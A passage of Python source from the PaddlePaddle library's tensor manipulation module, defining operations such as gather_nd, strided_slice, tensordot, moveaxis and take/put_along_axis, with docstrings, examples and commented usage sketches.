elif isinstance(shape, Variable):
shape.stop_gradient = True
out, _ = _C_ops.reshape2_(x, shape)
return out
def gather_nd(x, index, name=None):
"""
    This function is a high-dimensional extension of :code:`gather`
    and supports simultaneous indexing by multiple axes. :attr:`index` is a
    K-dimensional integer tensor, which is treated as a (K-1)-dimensional
    tensor of indices into :attr:`x`, where each element defines
    a slice of :attr:`x`:
.. math::
output[(i_0, ..., i_{K-2})] = input[index[(i_0, ..., i_{K-2})]]
Obviously, :code:`index.shape[-1] <= input.rank` . And, the output tensor has
shape :code:`index.shape[:-1] + input.shape[index.shape[-1]:]` .
.. code-block:: text
Given:
x = [[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]]
x.shape = (2, 3, 4)
* Case 1:
index = [[1]]
gather_nd(x, index)
= [x[1, :, :]]
= [[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]
* Case 2:
index = [[0,2]]
gather_nd(x, index)
= [x[0, 2, :]]
= [8, 9, 10, 11]
* Case 3:
index = [[1, 2, 3]]
gather_nd(x, index)
= [x[1, 2, 3]]
= [23]
Args:
        x (Tensor): The input Tensor whose data type should be bool, float32, float64, int32 or int64.
index (Tensor): The index input with rank > 1, index.shape[-1] <= input.rank.
Its dtype should be int32, int64.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
output (Tensor): A tensor with the shape index.shape[:-1] + input.shape[index.shape[-1]:]
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[[1, 2], [3, 4], [5, 6]],
[[7, 8], [9, 10], [11, 12]]])
index = paddle.to_tensor([[0, 1]])
output = paddle.gather_nd(x, index) #[[3, 4]]
"""
return paddle.fluid.layers.gather_nd(input=x, index=index, name=name)
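# --- Illustrative usage sketch (not part of the upstream Paddle source) ---
# The docstring above gives the output-shape rule
#     out.shape == index.shape[:-1] + x.shape[index.shape[-1]:]
# A small, hedged check of that rule, assuming a working ``paddle``
# installation (commented out to avoid import-time side effects):
#
#     import paddle
#     x = paddle.zeros([2, 3, 4])
#     index = paddle.to_tensor([[0, 1], [1, 2]])   # shape [2, 2]
#     out = paddle.gather_nd(x, index)
#     # expected: out.shape == [2, 4], i.e. [2] (= index.shape[:-1]) + [4] (= x.shape[2:])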
def strided_slice(x, axes, starts, ends, strides, name=None):
"""
This operator produces a slice of ``x`` along multiple axes. Similar to numpy:
https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Slice uses ``axes``, ``starts`` and ``ends`` attributes to specify the start and
end dimension for each axis in the list of axes and Slice uses this information
    to slice the input data tensor. If a negative value such as :math:`-i` is passed to
    ``starts`` or ``ends``, it represents the reverse position :math:`n - i` of that axis
    (where :math:`n` is the size of the axis and 0 is the initial position). The ``strides`` represents the step of
    slicing, and if ``strides`` is negative, the slice operation is performed in the opposite direction.
If the value passed to ``starts`` or ``ends`` is greater than n
(the number of elements in this dimension), it represents n.
For slicing to the end of a dimension with unknown size, it is recommended
    to pass in INT_MAX. The sizes of ``axes``, ``starts``, ``ends`` and ``strides`` must all be equal.
Following examples will explain how strided_slice works:
.. code-block:: text
Case1:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [1, 0]
ends = [2, 3]
strides = [1, 1]
Then:
result = [ [5, 6, 7], ]
Case2:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [2, 0]
strides = [1, -1]
Then:
result = [ [8, 7, 6], ]
Case3:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [-1, 1000]
strides = [1, 3]
Then:
result = [ [2], ]
Args:
x (Tensor): An N-D ``Tensor``. The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
axes (list|tuple): The data type is ``int32`` . Axes that `starts` and `ends` apply to.
            It's optional. If it is not provided, it will be treated as :math:`[0,1,...,len(starts)-1]`.
        starts (list|tuple|Tensor): The data type is ``int32`` . If ``starts`` is a list or tuple, the elements of
            it should be integers or Tensors with shape [1]. If ``starts`` is a Tensor, it should be a 1-D Tensor. It represents starting indices of corresponding axis in ``axes``.
        ends (list|tuple|Tensor): The data type is ``int32`` . If ``ends`` is a list or tuple, the elements of
            it should be integers or Tensors with shape [1]. If ``ends`` is a Tensor, it should be a 1-D Tensor. It represents ending indices of corresponding axis in ``axes``.
        strides (list|tuple|Tensor): The data type is ``int32`` . If ``strides`` is a list or tuple, the elements of
            it should be integers or Tensors with shape [1]. If ``strides`` is a Tensor, it should be a 1-D Tensor. It represents slice step of corresponding axis in ``axes``.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A ``Tensor`` with the same dimension as ``x``. The data type is same as ``x``.
Examples:
.. code-block:: python
import paddle
x = paddle.zeros(shape=[3,4,5,6], dtype="float32")
# example 1:
# attr starts is a list which doesn't contain Tensor.
axes = [1, 2, 3]
starts = [-3, 0, 2]
ends = [3, 2, 4]
strides_1 = [1, 1, 1]
strides_2 = [1, 1, 2]
sliced_1 = paddle.strided_slice(x, axes=axes, starts=starts, ends=ends, strides=strides_1)
# sliced_1 is x[:, 1:3:1, 0:2:1, 2:4:1].
# example 2:
            # attr starts is a list which contains a Tensor.
minus_3 = paddle.full(shape=[1], fill_value=-3, dtype='int32')
sliced_2 = paddle.strided_slice(x, axes=axes, starts=[minus_3, 0, 2], ends=ends, strides=strides_2)
# sliced_2 is x[:, 1:3:1, 0:2:1, 2:4:2].
"""
return paddle.fluid.layers.strided_slice(
input=x, axes=axes, starts=starts, ends=ends, strides=strides)
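# --- Illustrative usage sketch (not part of the upstream Paddle source) ---
# The docstring above recommends passing INT_MAX as ``ends`` to slice to the
# end of a dimension of unknown size, since any end larger than the dimension
# is clamped to it. A hedged example of that recommendation, assuming a
# working ``paddle`` installation (commented out to avoid import-time side effects):
#
#     import paddle
#     x = paddle.to_tensor([[1, 2, 3, 4], [5, 6, 7, 8]])
#     out = paddle.strided_slice(x, axes=[1], starts=[1], ends=[2147483647], strides=[1])
#     # expected result: [[2, 3, 4], [6, 7, 8]]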
def tensordot(x, y, axes=2, name=None):
r"""
This function computes a contraction, which sum the product of elements from two tensors along the given axes.
Args:
x (Tensor): The left tensor for contraction with data type ``float32`` or ``float64``.
y (Tensor): The right tensor for contraction with the same data type as ``x``.
axes (int|tuple|list|Tensor, optional): The axes to contract for ``x`` and ``y``, defaulted to integer ``2``.
1. It could be a non-negative integer ``n``,
               in which case the function will sum over the last ``n`` axes of ``x`` and the first ``n`` axes of ``y`` in order.
2. It could be a 1-d tuple or list with data type ``int``, in which ``x`` and ``y`` will be contracted along the same given axes.
For example, ``axes`` =[0, 1] applies contraction along the first two axes for ``x`` and the first two axes for ``y``.
3. It could be a tuple or list containing one or two 1-d tuple|list|Tensor with data type ``int``.
When containing one tuple|list|Tensor, the data in tuple|list|Tensor specified the same axes for ``x`` and ``y`` to contract.
When containing two tuple|list|Tensor, the first will be applied to ``x`` and the second to ``y``.
When containing more than two tuple|list|Tensor, only the first two axis sequences will be used while the others will be ignored.
4. It could be a tensor, in which the ``axes`` tensor will be translated to a python list
and applied the same rules described above to determine the contraction axes.
Note that the ``axes`` with Tensor type is ONLY available in Dygraph mode.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
    Returns:
Output (Tensor): The contraction result with the same data type as ``x`` and ``y``.
In general, :math:`output.ndim = x.ndim + y.ndim - 2 \times n_{axes}`, where :math:`n_{axes}` denotes the number of axes to be contracted.
NOTES:
1. This function supports tensor broadcast,
the size in the corresponding dimensions of ``x`` and ``y`` should be equal, or applies to the broadcast rules.
2. This function also supports axes expansion,
when the two given axis sequences for ``x`` and ``y`` are of different lengths,
the shorter sequence will expand the same axes as the longer one at the end.
For example, if ``axes`` =[[0, 1, 2, 3], [1, 0]],
the axis sequence for ``x`` is [0, 1, 2, 3],
while the corresponding axis sequences for ``y`` will be expanded from [1, 0] to [1, 0, 2, 3].
Examples:
.. code-block:: python
import paddle
data_type = 'float64'
# For two 2-d tensor x and y, the case axes=0 is equivalent to outer product.
# Note that tensordot supports empty axis sequence, so all the axes=0, axes=[], axes=[[]], and axes=[[],[]] are equivalent cases.
x = paddle.arange(4, dtype=data_type).reshape([2, 2])
y = paddle.arange(4, dtype=data_type).reshape([2, 2])
z = paddle.tensordot(x, y, axes=0)
# z = [[[[0., 0.],
# [0., 0.]],
#
# [[0., 1.],
# [2., 3.]]],
#
#
# [[[0., 2.],
# [4., 6.]],
#
# [[0., 3.],
# [6., 9.]]]]
# For two 1-d tensor x and y, the case axes=1 is equivalent to inner product.
x = paddle.arange(10, dtype=data_type)
y = paddle.arange(10, dtype=data_type)
z1 = paddle.tensordot(x, y, axes=1)
z2 = paddle.dot(x, y)
# z1 = z2 = [285.]
# For two 2-d tensor x and y, the case axes=1 is equivalent to matrix multiplication.
x = paddle.arange(6, dtype=data_type).reshape([2, 3])
y = paddle.arange(12, dtype=data_type).reshape([3, 4])
z1 = paddle.tensordot(x, y, axes=1)
z2 = paddle.matmul(x, y)
# z1 = z2 = [[20., 23., 26., 29.],
# [56., 68., 80., 92.]]
# When axes is a 1-d int list, x and y will be contracted along the same given axes.
# Note that axes=[1, 2] is equivalent to axes=[[1, 2]], axes=[[1, 2], []], axes=[[1, 2], [1]], and axes=[[1, 2], [1, 2]].
x = paddle.arange(24, dtype=data_type).reshape([2, 3, 4])
y = paddle.arange(36, dtype=data_type).reshape([3, 3, 4])
z = paddle.tensordot(x, y, axes=[1, 2])
# z = [[506. , 1298., 2090.],
# [1298., 3818., 6338.]]
# When axes is a list containing two 1-d int list, the first will be applied to x and the second to y.
x = paddle.arange(60, dtype=data_type).reshape([3, 4, 5])
y = paddle.arange(24, dtype=data_type).reshape([4, 3, 2])
z = paddle.tensordot(x, y, axes=([1, 0], [0, 1]))
# z = [[4400., 4730.],
# [4532., 4874.],
# [4664., 5018.],
# [4796., 5162.],
# [4928., 5306.]]
# Thanks to the support of axes expansion, axes=[[0, 1, 3, 4], [1, 0, 3, 4]] can be abbreviated as axes= [[0, 1, 3, 4], [1, 0]].
x = paddle.arange(720, dtype=data_type).reshape([2, 3, 4, 5, 6])
y = paddle.arange(720, dtype=data_type).reshape([3, 2, 4, 5, 6])
z = paddle.tensordot(x, y, axes=[[0, 1, 3, 4], [1, 0]])
# z = [[23217330., 24915630., 26613930., 28312230.],
# [24915630., 26775930., 28636230., 30496530.],
# [26613930., 28636230., 30658530., 32680830.],
# [28312230., 30496530., 32680830., 34865130.]]
"""
op_type = 'tensordot'
input_dtype = ['float32', 'float64']
check_variable_and_dtype(x, 'x', input_dtype, op_type)
check_variable_and_dtype(y, 'y', input_dtype, op_type)
check_type(axes, 'axes', (int, tuple, list, Variable), op_type)
def _var_to_list(var):
if in_dygraph_mode():
return tolist(var)
raise TypeError(
"The 'axes' with type 'Tensor' in " + op_type +
" is not available in static graph mode, "
"please convert its type to int|Tuple|List, or use dynamic graph mode."
)
axes_x = []
axes_y = []
if np.issubdtype(type(axes), np.integer):
assert axes >= 0, (
"The 'axes' in " + op_type +
f" should not be negative, but received axes={axes}.")
axes_x = range(x.ndim - axes, x.ndim)
axes_y = range(axes)
else:
if isinstance(axes, Variable):
axes = _var_to_list(axes)
if not axes or np.issubdtype(type(axes[0]), np.integer):
axes_x = axes
else:
axes_x = axes[0]
if len(axes) > 1:
axes_y = axes[1]
if isinstance(axes_x, Variable):
axes_x = _var_to_list(axes_x)
if isinstance(axes_y, Variable):
axes_y = _var_to_list(axes_y)
axes_x, axes_y = list(axes_x), list(axes_y)
len_axes_x, len_axes_y = len(axes_x), len(axes_y)
if len_axes_x < len_axes_y:
axes_x.extend(axes_y[len_axes_x:])
elif len_axes_y < len_axes_x:
axes_y.extend(axes_x[len_axes_y:])
shape_x, shape_y = list(x.shape), list(y.shape)
need_contracted_dim_x = np.zeros((x.ndim), dtype=bool)
need_contracted_dim_y = np.zeros((y.ndim), dtype=bool)
contraction_size = 1
for i in range(len(axes_x)):
dim_x, dim_y = axes_x[i], axes_y[i]
sx, sy = shape_x[dim_x], shape_y[dim_y]
if sx == 1:
shape_y[dim_y] = 1
y = y.sum(dim_y).reshape(shape_y)
elif sy == 1:
shape_x[dim_x] = 1
x = x.sum(dim_x).reshape(shape_x)
else:
assert sx == sy, "The dimensional size for 'x' and 'y' in " + op_type + f" should match each other, but 'x' has size {sx} in dim {dim_x} while 'y' has size {sy} in dim {dim_y}."
need_contracted_dim_x[dim_x] = True
need_contracted_dim_y[dim_y] = True
contraction_size *= shape_x[dim_x]
perm_x = []
perm_y = []
shape_out = []
not_contraction_size_x = 1
not_contraction_size_y = 1
for i in range(x.ndim):
if not need_contracted_dim_x[i]:
perm_x.append(i)
shape_out.append(shape_x[i])
not_contraction_size_x *= shape_x[i]
perm_x.extend(axes_x)
perm_y.extend(axes_y)
for i in range(y.ndim):
if not need_contracted_dim_y[i]:
perm_y.append(i)
shape_out.append(shape_y[i])
not_contraction_size_y *= shape_y[i]
if not shape_out:
shape_out = [1]
x = x.transpose(perm=perm_x).reshape(
[not_contraction_size_x, contraction_size])
y = y.transpose(perm=perm_y).reshape(
[contraction_size, not_contraction_size_y])
out = x.matmul(y).reshape(shape_out)
return out
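# --- Illustrative sketch (not part of the upstream Paddle source) ---
# The implementation above reduces a general contraction to
# transpose -> reshape -> matmul. A hedged NumPy re-derivation of that core
# reduction (ignoring the size-1 broadcasting and axes-expansion handling),
# cross-checked against ``np.tensordot``; commented out to avoid import-time
# side effects:
#
#     import numpy as np
#     x = np.arange(24, dtype=np.float64).reshape(2, 3, 4)
#     y = np.arange(36, dtype=np.float64).reshape(3, 3, 4)
#     axes_x, axes_y = [1, 2], [1, 2]
#     keep_x = [d for d in range(x.ndim) if d not in axes_x]      # uncontracted axes of x
#     keep_y = [d for d in range(y.ndim) if d not in axes_y]      # uncontracted axes of y
#     k = int(np.prod([x.shape[d] for d in axes_x]))              # total contraction size
#     xm = x.transpose(keep_x + axes_x).reshape(-1, k)            # (2, 12)
#     ym = y.transpose(axes_y + keep_y).reshape(k, -1)            # (12, 3)
#     out = xm @ ym                                               # (2, 3)
#     assert np.allclose(out, np.tensordot(x, y, axes=(axes_x, axes_y)))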
def as_complex(x, name=None):
"""Transform a real tensor to a complex tensor.
The data type of the input tensor is 'float32' or 'float64', and the data
type of the returned tensor is 'complex64' or 'complex128', respectively.
    The shape of the input tensor is ``(* ,2)``, (``*`` means arbitrary shape), i.e.
    the size of the last axis should be 2, which represents the real and imaginary parts
    of a complex number. The shape of the returned tensor is ``(*,)``.
Args:
x (Tensor): The input tensor. Data type is 'float32' or 'float64'.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: The output. Data type is 'complex64' or 'complex128', with the same precision as the input.
Examples:
.. code-block:: python
import paddle
x = paddle.arange(12, dtype=paddle.float32).reshape([2, 3, 2])
y = paddle.as_complex(x)
print(y.numpy())
# [[ 0. +1.j 2. +3.j 4. +5.j]
# [ 6. +7.j 8. +9.j 10.+11.j]]
"""
if in_dygraph_mode():
return paddle._C_ops.as_complex(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'as_complex')
op_type = "as_complex"
helper = LayerHelper(op_type, **locals())
inputs = {"X": x}
out = helper.create_variable_for_type_inference(
dtype=_real_to_complex_dtype(x.dtype))
outputs = {"Out": out}
attrs = {}
helper.append_op(type=op_type, inputs=inputs, attrs=attrs, outputs=outputs)
return out
def as_real(x, name=None):
"""Transform a complex tensor to a real tensor.
The data type of the input tensor is 'complex64' or 'complex128', and the data
type of the returned tensor is 'float32' or 'float64', respectively.
    When the shape of the input tensor is ``(*, )``, (``*`` means arbitrary shape),
the shape of the output tensor is ``(*, 2)``, i.e. the shape of the output is
the shape of the input appended by an extra ``2``.
Args:
x (Tensor): The input tensor. Data type is 'complex64' or 'complex128'.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: The output. Data type is 'float32' or 'float64', with the same precision as the input.
Examples:
.. code-block:: python
import paddle
x = paddle.arange(12, dtype=paddle.float32).reshape([2, 3, 2])
y = paddle.as_complex(x)
z = paddle.as_real(y)
print(z.numpy())
# [[[ 0. 1.]
# [ 2. 3.]
# [ 4. 5.]]
# [[ 6. 7.]
# [ 8. 9.]
# [10. 11.]]]
"""
if in_dygraph_mode():
return paddle._C_ops.as_real(x)
check_variable_and_dtype(x, 'x', ['complex64', 'complex128'], 'as_real')
op_type = "as_real"
helper = LayerHelper(op_type, **locals())
inputs = {"X": x}
out = helper.create_variable_for_type_inference(
dtype=_complex_to_real_dtype(x.dtype))
outputs = {"Out": out}
helper.append_op(type=op_type, inputs=inputs, outputs=outputs)
return out
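# --- Illustrative usage sketch (not part of the upstream Paddle source) ---
# ``as_complex`` and ``as_real`` are shape-inverse views of each other:
# ``(*, 2)`` real <-> ``(*,)`` complex. A hedged round-trip check, assuming a
# working ``paddle`` installation (commented out to avoid import-time side effects):
#
#     import paddle
#     x = paddle.rand([2, 3, 2], dtype='float32')
#     roundtrip = paddle.as_real(paddle.as_complex(x))
#     # expected: roundtrip has the same shape [2, 3, 2] and values as x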
def repeat_interleave(x, repeats, axis=None, name=None):
"""
    Returns a new tensor which repeats the ``x`` tensor along dimension ``axis`` using
    the entries in ``repeats``, which is an int or a Tensor.
    Args:
        x (Tensor): The input Tensor to be operated. The data type of ``x`` can be float32, float64, int32 or int64.
        repeats (Tensor or int): The number of repetitions for each element. repeats is broadcasted to fit the shape of the given axis.
        axis (int, optional): The dimension in which we manipulate. Default: None, in which case the input is flattened and the output is a 1-D tensor.
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: A Tensor with same data type as ``x``.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
repeats = paddle.to_tensor([3, 2, 1], dtype='int32')
paddle.repeat_interleave(x, repeats, 1)
# [[1, 1, 1, 2, 2, 3],
# [4, 4, 4, 5, 5, 6]]
paddle.repeat_interleave(x, 2, 0)
# [[1, 2, 3], [1, 2, 3], [4, 5, 6], [4, 5, 6]]
paddle.repeat_interleave(x, 2, None)
# [1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6]
"""
if axis is None:
x = paddle.flatten(x)
axis = 0
if in_dygraph_mode():
if isinstance(repeats, int):
return _C_ops.repeat_interleave(x, None, 'Repeats', repeats, 'dim',
axis)
elif isinstance(repeats, Variable):
return _C_ops.repeat_interleave(x, repeats, 'dim', axis)
helper = LayerHelper("repeat_interleave", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'paddle.tensor.manipulation.repeat_interleave')
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='repeat_interleave',
inputs={
'X': x,
'RepeatsTensor': repeats if isinstance(repeats, Variable) else None
},
outputs={'Out': out},
attrs={
'dim': axis,
'Repeats': repeats if isinstance(repeats, int) else 0
})
return out
def moveaxis(x, source, destination, name=None):
"""
Move the axis of tensor from ``source`` position to ``destination`` position.
    Other axes that have not been moved keep their original order.
Args:
        x (Tensor): The input Tensor. It is an N-D Tensor of data types bool, int32, int64, float32, float64, complex64, complex128.
        source(int|tuple|list): ``source`` position of axis that will be moved. Each element must be a unique integer.
        destination(int|tuple|list(int)): ``destination`` position of axis that has been moved. Each element must be a unique integer.
name(str, optional): The default value is None. Normally there is no need for user to set this
property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
        Tensor: A new tensor whose axes have been moved.
Examples:
.. code-block:: python
import paddle
x = paddle.ones([3, 2, 4])
paddle.moveaxis(x, [0, 1], [1, 2]).shape
# [4, 3, 2]
x = paddle.ones([2, 3])
paddle.moveaxis(x, 0, 1) # equivalent to paddle.t(x)
# [3, 2]
"""
src = [source] if isinstance(source, int) else source
dst = [destination] if isinstance(destination, int) else destination
    assert len(src) == len(dst), \
        "'source' must have the same number of elements as 'destination'"
count = Counter(src).most_common(1)
if count[0][1] > 1:
raise ValueError("Each elemment of 'source' must be unique!")
count = Counter(dst).most_common(1)
if count[0][1] > 1:
raise ValueError("Each elemment of 'destination' must be unique!")
ndim = len(x.shape)
# perm is the new order after move axis
perm = list(range(ndim))
src_dims = list(range(ndim))
dst_dims = list(range(ndim))
for i, axis in enumerate(zip(src, dst)):
        assert isinstance(axis[0], int), \
            "Each element of 'source' must be an integer."
        if axis[0] < 0:
            assert axis[0] >= -ndim, \
                "'source' must be in the range of [-{0}, {0})".format(ndim)
            src[i] += ndim
        else:
            assert axis[0] < ndim, \
                "'source' must be in the range of [-{0}, {0})".format(ndim)
        assert isinstance(axis[1], int), \
            "Each element of 'destination' must be an integer."
        if axis[1] < 0:
            assert axis[1] >= -ndim, \
                "'destination' must be in the range of [-{0}, {0})".format(ndim)
            dst[i] += ndim
        else:
            assert axis[1] < ndim, \
                "'destination' must be in the range of [-{0}, {0})".format(ndim)
perm[dst[i]] = src[i]
src_dims.remove(src[i])
dst_dims.remove(dst[i])
for i in range(len(src_dims)):
perm[dst_dims[i]] = src_dims[i]
if in_dygraph_mode():
out, _ = _C_ops.transpose2(x, 'axis', perm)
return out
check_variable_and_dtype(
x, 'x', ['bool', 'float16', 'float32', 'float64', 'int32', 'int64'],
'moveaxis')
helper = LayerHelper('moveaxis', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='transpose2',
inputs={'X': [x]},
outputs={'Out': [out],
'XShape': [x_shape]},
attrs={'axis': perm})
return out
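# --- Illustrative sketch (not part of the upstream Paddle source) ---
# A hedged, pure-Python trace of the permutation that ``moveaxis`` builds:
# each source axis is pinned at its destination slot, then the remaining
# slots are filled with the unmoved axes in their original order. For
# source=[0, 1], destination=[1, 2] on a rank-3 tensor:
#
#     ndim = 3
#     src, dst = [0, 1], [1, 2]
#     perm = list(range(ndim))              # [0, 1, 2]
#     src_dims = list(range(ndim))
#     dst_dims = list(range(ndim))
#     for s, d in zip(src, dst):
#         perm[d] = s                       # pin moved axes at their destinations
#         src_dims.remove(s)
#         dst_dims.remove(d)
#     for d, s in zip(dst_dims, src_dims):
#         perm[d] = s                       # fill remaining slots in order
#     # perm == [2, 0, 1]; transposing a [3, 2, 4] tensor with it yields shape
#     # [4, 3, 2], matching the docstring example.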
def non_negative_axis(arr, axis):
ndim = len(arr.shape)
if axis >= 0:
assert axis < ndim, "'axis' must be in the range of [-{0}, {0})".format(
ndim)
else:
assert axis >= -ndim, "'axis' must be in the range of [-{0}, {0})".format(
ndim)
axis += ndim
return axis
def infer_broadcast_shape(arr, indices, axis):
# This function is used in take/put_along_axis
broadcast_shape_list = list(arr.shape)
broadcast_shape_list[axis] = list(indices.shape)[axis]
broadcast_shape = tuple(broadcast_shape_list)
for i in range(len(arr.shape)):
if arr.shape[i] < indices.shape[i]:
# if indices matrix has larger size than arr matrix, do not broadcast.
return None
return broadcast_shape
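# --- Illustrative sketch (not part of the upstream Paddle source) ---
# A hedged trace of what ``infer_broadcast_shape`` returns (commented out to
# avoid import-time side effects):
#
#     import paddle
#     arr = paddle.zeros([3, 4])
#     small = paddle.zeros([1, 1], dtype='int64')
#     infer_broadcast_shape(arr, small, 0)   # -> (1, 4): arr's size along axis 0
#                                            #    is replaced by indices' size there
#     big = paddle.zeros([5, 4], dtype='int64')
#     infer_broadcast_shape(arr, big, 0)     # -> None: indices is larger than arr
#                                            #    along a dim, so the callers broadcast
#                                            #    arr toward indices instead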
def take_along_axis(arr, indices, axis):
"""
Take values from the input array by given indices matrix along the designated axis.
Args:
arr (Tensor) : The input Tensor. Supported data types are float32 and float64.
indices (Tensor) : Indices to take along each 1d slice of arr. This must match the dimension of arr,
            and needs to be broadcastable against arr. Supported data types are int32 and int64.
axis (int) : The axis to take 1d slices along.
Returns:
        Tensor: The indexed element, with the same dtype as arr
Examples:
.. code-block:: python
import paddle
import numpy as np
x_np = np.array([[1, 2, 3], [4, 5, 6], [7,8,9]])
index_np = np.array([[0]])
x = paddle.to_tensor(x_np)
index = paddle.to_tensor(index_np)
axis = 0
result = paddle.take_along_axis(x, index, axis)
print(result)
# [[1, 2, 3]]
"""
if (len(arr.shape) != len(indices.shape)):
raise ValueError(
"`indices` and `arr` must have the same number of dimensions!")
axis = non_negative_axis(arr, axis)
broadcast_shape = infer_broadcast_shape(arr, indices, axis)
if not broadcast_shape:
        # if the indices matrix has a larger size than arr, arr should be broadcast to the indices shape.
broadcast_shape = indices.shape
if in_dygraph_mode():
indices = paddle.broadcast_to(indices, broadcast_shape)
broadcast_shape_list = list(broadcast_shape)
broadcast_shape_list[axis] = list(arr.shape)[axis]
broadcast_shape = tuple(broadcast_shape_list)
arr = paddle.broadcast_to(arr, broadcast_shape)
return _C_ops.take_along_axis(arr, indices, 'Axis', axis)
check_variable_and_dtype(
arr, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
'take_along_axis')
check_variable_and_dtype(indices, 'index', ['int32', 'int64'],
'take_along_axis')
indices = paddle.broadcast_to(indices, broadcast_shape)
broadcast_shape_list = list(broadcast_shape)
broadcast_shape_list[axis] = list(arr.shape)[axis]
broadcast_shape = tuple(broadcast_shape_list)
arr = paddle.broadcast_to(arr, broadcast_shape)
helper = LayerHelper('take_along_axis', **locals())
dtype = helper.input_dtype()
result = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="take_along_axis",
inputs={"Input": arr,
"Index": indices},
attrs={"Axis": axis},
outputs={"Result": result})
return result
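# --- Illustrative usage sketch (not part of the upstream Paddle source) ---
# The docstring example above indexes along axis 0; a hedged example of the
# per-row selection along axis 1, assuming a working ``paddle`` installation
# (commented out to avoid import-time side effects):
#
#     import paddle
#     x = paddle.to_tensor([[1., 2., 3.], [4., 5., 6.]])
#     idx = paddle.to_tensor([[2], [0]])
#     out = paddle.take_along_axis(x, idx, axis=1)
#     # expected result: [[3.], [4.]]  (element 2 of row 0, element 0 of row 1)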
def put_along_axis(arr, indices, values, axis, reduce='assign'):
"""
Put values into the destination array by given indices matrix along the designated axis.
Args:
arr (Tensor) : The Destination Tensor. Supported data types are float32 and float64.
        indices (Tensor) : Indices to put along each 1d slice of arr. This must match the dimension of arr,
            and needs to be broadcastable against arr. Supported data types are int32 and int64.
        values (scalar|Tensor) : The value element(s) to put into arr; it is broadcast to the shape of the (broadcast) indices.
        axis (int) : The axis to put 1d slices along.
        reduce (str, optional) : The reduce operation, default is 'assign', supporting 'add', 'assign', 'mul' and 'multiply'.
    Returns:
        Tensor: The indexed element, with the same dtype as arr
Examples:
.. code-block:: python
import paddle
import numpy as np
x_np = np.array([[10, 30, 20], [60, 40, 50]])
index_np = np.array([[0]])
x = paddle.to_tensor(x_np)
index = paddle.to_tensor(index_np)
value = 99
axis = 0
result = paddle.put_along_axis(x, index, value, axis)
print(result)
# [[99, 99, 99],
# [60, 40, 50]]
"""
if (len(arr.shape) != len(indices.shape)):
raise ValueError(
"`indices` and `arr` must have the same number of dimensions!")
axis = non_negative_axis(arr, axis)
broadcast_shape = infer_broadcast_shape(arr, indices, axis)
if in_dygraph_mode():
values = paddle.to_tensor(values) if not isinstance(
values, paddle.Tensor) else values
if broadcast_shape:
indices = paddle.broadcast_to(indices, broadcast_shape)
values = paddle.broadcast_to(values, indices.shape)
return _C_ops.put_along_axis(arr, indices, values, "Axis", axis,
"Reduce", reduce)
check_variable_and_dtype(
arr, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
'put_along_axis')
check_variable_and_dtype(indices, 'index', ['int32', 'int64'],
'put_along_axis')
if broadcast_shape:
indices = paddle.broadcast_to(indices, broadcast_shape)
values = paddle.broadcast_to(values, indices.shape)
helper = LayerHelper('put_along_axis', **locals())
dtype = helper.input_dtype()
result = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="put_along_axis",
inputs={"Input": arr,
"Index": indices,
"Value": values},
attrs={"Axis": axis,
"Reduce": reduce},
outputs={"Result": result})
return result
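# --- Illustrative usage sketch (not part of the upstream Paddle source) ---
# The docstring above lists several reduce modes but only demonstrates the
# default 'assign'. A hedged sketch of reduce='add', under the assumption that
# 'add' accumulates the broadcast values into the indexed slice (commented out
# to avoid import-time side effects):
#
#     import paddle
#     x = paddle.to_tensor([[10., 30., 20.], [60., 40., 50.]])
#     index = paddle.to_tensor([[0]], dtype='int64')
#     out = paddle.put_along_axis(x, index, 99., axis=0, reduce='add')
#     # expected (99 added across the indexed row):
#     # [[109., 129., 119.],
#     #  [ 60.,  40.,  50.]]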
@inplace_apis_in_dygraph_only
def put_along_axis_(arr, indices, values, axis, reduce='assign'):
r"""
Inplace version of ``put_along_axis`` API, the output Tensor will be inplaced with input ``arr``.
Please refer to :ref:`api_tensor_put_along_axis`.
"""
if (len(arr.shape) != len(indices.shape)):
raise ValueError(
"`indices` and `arr` must have the same number of dimensions!")
axis = non_negative_axis(arr, axis)
broadcast_shape = infer_broadcast_shape(arr, indices, axis)
values = paddle.to_tensor(values) if not isinstance(
values, paddle.Tensor) else values
if broadcast_shape:
indices = paddle.broadcast_to(indices, broadcast_shape)
values = paddle.broadcast_to(values, indices.shape)
return _C_ops.put_along_axis_(arr, indices, values, "Axis", axis, "Reduce",
reduce)
| 38.010584 | 457 | 0.565825 |